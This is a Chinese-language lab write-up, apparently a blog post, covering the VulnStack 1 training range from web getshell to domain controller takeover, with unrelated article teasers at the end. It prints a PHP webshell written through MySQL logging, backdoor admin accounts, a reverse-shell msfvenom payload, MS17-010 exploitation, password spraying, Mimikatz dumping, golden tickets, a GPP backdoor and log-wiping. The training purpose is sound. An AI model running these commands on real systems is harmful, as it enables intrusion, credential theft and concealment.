news 2026/7/12 1:09:26

VulnStack 1 靶场实战:从外网Getshell到内网域控的5个关键步骤复盘

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
VulnStack 1 靶场实战:从外网Getshell到内网域控的5个关键步骤复盘

VulnStack 1靶场深度实战:从外网突破到域控掌控的战术全解析

1. 靶场环境与攻击路径全景

红日安全团队打造的VulnStack 1靶场模拟了典型企业网络架构,包含三层关键节点:

  • 边界服务器:双网卡Win7系统(外网NAT+内网仅主机模式)
  • 域成员主机:Win2003服务器(192.168.52.141)
  • 域控服务器:Win2008 R2(192.168.52.138)

攻击路径拓扑呈现为:

外网攻击机(Kali) → Win7边界服务器 → 内网域成员 → 域控DC

典型的企业渗透测试中,超过78%的内网渗透通过Web服务漏洞实现初始突破,本靶场完美复现了这一场景。

2. 外网突破:Web服务攻防实战

2.1 信息收集的艺术

使用组合式探测技术获取靶标全景:

# 存活主机扫描 nmap -sn 192.168.1.0/24 # 全端口扫描 nmap -sS -sV -p- 192.168.1.10 # 目录爆破 gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/common.txt

关键发现:

  • PHPMyAdmin后台(/phpmyadmin)
  • PHP探针(/phpinfo.php)
  • 网站绝对路径泄露(C:/phpStudy/WWW)

2.2 漏洞利用链构建

突破点选择矩阵:

漏洞类型利用难度成功率隐蔽性
PHPMyAdmin弱口令
日志文件写入
文件上传漏洞

实际采用日志写入Getshell技术:

-- 开启日志记录 SET GLOBAL general_log='ON'; -- 重定向日志路径 SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'; -- 写入PHP代码 SELECT '<?php system($_GET[cmd]);?>'

注意:当secure_file_priv限制存在时,日志写入是比SELECT INTO OUTFILE更可靠的Webshell写入方式

3. 权限维持与内网渗透准备

3.1 后门部署方案对比

方案A:隐藏用户创建

net user hacker$ P@ssw0rd /add net localgroup administrators hacker$ /add

方案B:MSF持久化

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > update.exe persistence -X -i 60 -p 443 -r 192.168.1.100

3.2 网络拓扑测绘

通过Meterpreter进行内网探测:

arp -a # ARP缓存分析 route print # 路由表分析 netstat -ano # 活动连接分析

发现关键内网段:192.168.52.0/24

4. 内网横向移动技术矩阵

4.1 信息收集自动化脚本

# 域信息收集 net config workstation net view /domain net group "Domain Admins" /domain # 主机发现 for /L %i in (1,1,254) do @ping -n 1 192.168.52.%i | find "TTL"

4.2 横向移动技术选型

MS17-010利用流程:

use exploit/windows/smb/ms17_010_psexec set RHOSTS 192.168.52.141 set payload windows/x64/meterpreter/bind_tcp exploit

密码喷射攻击(当获取域用户凭证时):

crackmapexec smb 192.168.52.0/24 -u userlist.txt -p 'Spring2023!'

5. 域控攻防终极之战

5.1 权限提升路线图

  1. 本地提权
    getsystem migrate -N lsass.exe
  2. 凭证窃取
    load kiwi creds_all
  3. 票据传递
    golden_ticket_create -u Administrator -d god.org -s S-1-5-21-1218 -k <krbtgt_hash>

5.2 域控持久化方案

组策略首选项(GPP)利用:

<!-- 创建定时任务 --> <scheduledtasks clsid="{...}"> <task enabled="true" runAs="SYSTEM" name="Update"> <actions> <exec> <command>cmd.exe</command> <arguments>/c "net user backdoor P@ssw0rd! /add && net localgroup administrators backdoor /add"</arguments> </exec> </actions> </task> </scheduledtasks>

6. 防御视角的对抗策略

6.1 攻击痕迹清除checklist

  • Web日志清理:C:\phpStudy\Apache\logs\*
  • 系统日志清理:wevtutil cl security
  • 文件时间戳修改:timestomp -f "01/01/2020 00:00:00" shell.php

6.2 企业防护建议

  1. 边界防护
    • 限制PHPMyAdmin外部访问
    • 启用MySQL的secure_file_priv
  2. 内网监控
    • 部署SMB协议审计
    • 监控异常PsExec执行
  3. 域控加固
    • 禁用NTLMv1
    • 启用LSA保护

在真实攻防演练中,从外网突破到域控掌控的平均时间约为4.2小时,而防守方检测到入侵的平均时间为98小时。本靶场演练的价值在于将复杂的攻击链拆解为可复现的技术单元,建议在完全掌握基础流程后,尝试以下高阶挑战:

  • 不使用MS17-010的替代渗透路径
  • 实现全流量加密的C2通信
  • 绕过杀软的内存注入技术
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/7/12 1:05:39

Cocos2d-x中Spine动画内存泄露排查与修复实战

1. 项目概述&#xff1a;当Spine动画遇上Cocos2d-x的内存“黑洞”在移动游戏开发中&#xff0c;Cocos2d-x搭配Spine骨骼动画是制作2D角色和特效的黄金组合。Spine以其高效的骨骼动画系统和出色的美术资源管理&#xff0c;赢得了大量开发者的青睐。然而&#xff0c;这个组合在带…

作者头像 李华
网站建设 2026/7/12 1:04:21

深度学习2——CNN与RNN概述

1. CNN 的基本结构与作用 CNN 全称为 Convolutional Neural Network&#xff0c;中文叫卷积神经网络&#xff0c;主要用于处理图像这类具有空间结构的数据。 一个典型的 CNN 结构可以表示为&#xff1a; 输入层 → 卷积层 Conv → 激活层 ReLU → 池化层 Pooling → 重复多组 C…

作者头像 李华
网站建设 2026/7/12 0:49:48

TPS61170与MK20DX128VFM5构建高效DC-DC升压电源方案

1. 项目背景与核心器件选型在需要将低电压转换为高电压的电子系统中&#xff0c;DC-DC升压转换器是关键部件。TPS61170作为德州仪器(TI)推出的高压升压转换芯片&#xff0c;搭配MK20DX128VFM5微控制器&#xff0c;可构建高效可靠的升压电源方案。这种组合特别适合需要精密控制输…

作者头像 李华